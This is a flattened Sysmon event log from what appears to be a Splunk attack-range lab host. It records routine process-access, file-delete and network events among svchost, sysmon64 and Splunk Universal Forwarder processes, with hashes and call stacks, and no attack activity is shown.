11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-19B8-6216-4F05-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19B8-6216-4F05-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.697{4F8D34B0-19B8-6216-4F05-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.462{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02C9DA3B46861C998BE5E3AF0D11FBD4,SHA256=72D315D43254F27A50E03D024AF5D2B79204787023E06B5C60D38FBBF19EB7DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.415{4F8D34B0-19B8-6216-4E05-000000003902}32322560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19B8-6216-4E05-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-19B8-6216-4E05-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.196{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19B8-6216-4E05-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.197{4F8D34B0-19B8-6216-4E05-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000222884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:41.699{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51750-false10.0.1.12-8000- 23542300x8000000000000000222915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:45.556{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=634EF732CED2AE1583987FD5714D040F,SHA256=7E590DEB603ADA9C6B2BC27B4433EA36BD1AFDB4E443D0F7D72E09ED9B44008C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:45.493{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C319E788426894334D3CD884466D73,SHA256=AF90BFC3B8911E835322565A9603FBC0019B4A2452525E06D638662A80B1A0AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:45.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D443B51BBA115316171E1923998217D4,SHA256=B00ECC4D3DF63F6C6C89EF262C30913B0AE6944881297A288453CD83A6C685A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:45.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4210FA754C0E3348FFE0AFC09168DF20,SHA256=1A27CEC7B9C84046825AE2E2BA76A129B0DA3F342FD1F639A0D8A3B193CA41E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.853{4F8D34B0-19BA-6216-5005-000000003902}6962552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.759{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:46.649{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 